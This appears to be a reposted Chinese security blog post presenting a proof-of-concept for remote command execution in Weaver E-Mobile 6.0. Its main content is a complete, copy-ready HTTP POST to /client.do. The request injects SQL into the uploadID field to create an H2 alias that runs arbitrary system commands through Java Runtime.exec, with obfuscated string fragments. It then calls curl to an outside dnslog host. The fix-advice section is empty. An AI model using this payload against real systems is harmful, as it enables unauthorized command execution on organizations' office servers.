泛微E-Mobile 6.0远程命令执行漏洞PoC

admin 2024年10月8日01:06:31评论33 views字数 1762阅读5分52秒阅读模式
0x01漏洞介绍
Weaver E-Mobile是中国泛微科技(Weaver)公司的一个协同办公系统。

E-Mobile6最新版是上海泛微网络科技推出的一款手机办公应用,将企业微信重新改造,加入更多丰富实用的功能,让沟通更加便捷。

0x02影响版本

泛微E-Mobile 6.0

0x03漏洞复现
1.部署漏洞环境访问

泛微E-Mobile 6.0远程命令执行漏洞PoC

2.对漏洞进行复现

  Poc (POST)

POST /client.do HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTm8YXcJeyKDClbU7Content-Length: 1151------WebKitFormBoundaryTm8YXcJeyKDClbU7Content-Disposition: form-data; name="method"getupload------WebKitFormBoundaryTm8YXcJeyKDClbU7Content-Disposition: form-data; name="uploadID"1';CREATE ALIAS if not exists MzSNqKsZTagmf AS CONCAT('void e(String cmd) throws java.la','ng.Exception{','Object curren','tRequest = Thre','ad.currentT','hread().getConte','xtClass','Loader().loadC','lass("com.caucho.server.dispatch.ServletInvocation").getMet','hod("getContextRequest").inv','oke(null);java.la','ng.reflect.Field _responseF = currentRequest.getCl','ass().getSuperc','lass().getDeclar','edField("_response");_responseF.setAcce','ssible(true);Object response = _responseF.get(currentRequest);java.la','ng.reflect.Method getWriterM = response.getCl','ass().getMethod("getWriter");java.i','o.Writer writer = (java.i','o.Writer)getWriterM.inv','oke(response);java.ut','il.Scan','ner scan','ner = (new java.util.Scann','er(Runt','ime.getRunt','ime().ex','ec(cmd).getInput','Stream())).useDelimiter("\A");writer.write(scan','ner.hasNext()?sca','nner.next():"");}');CALL MzSNqKsZTagmf('curl 9b0o4q.dnslog.cn');--------WebKitFormBoundaryTm8YXcJeyKDClbU7--

POST请求,响应存在漏洞

泛微E-Mobile 6.0远程命令执行漏洞PoC

DNSlog生成测试域名

泛微E-Mobile 6.0远程命令执行漏洞PoC

4.nuclei测试(漏洞存在)

泛微E-Mobile 6.0远程命令执行漏洞PoC

泛微E-Mobile 6.0远程命令执行漏洞PoC
0x04修复建议

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月8日01:06:31
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   泛微E-Mobile 6.0远程命令执行漏洞PoChttps://cn-sec.com/archives/1940961.html

发表评论

匿名网友 填写信息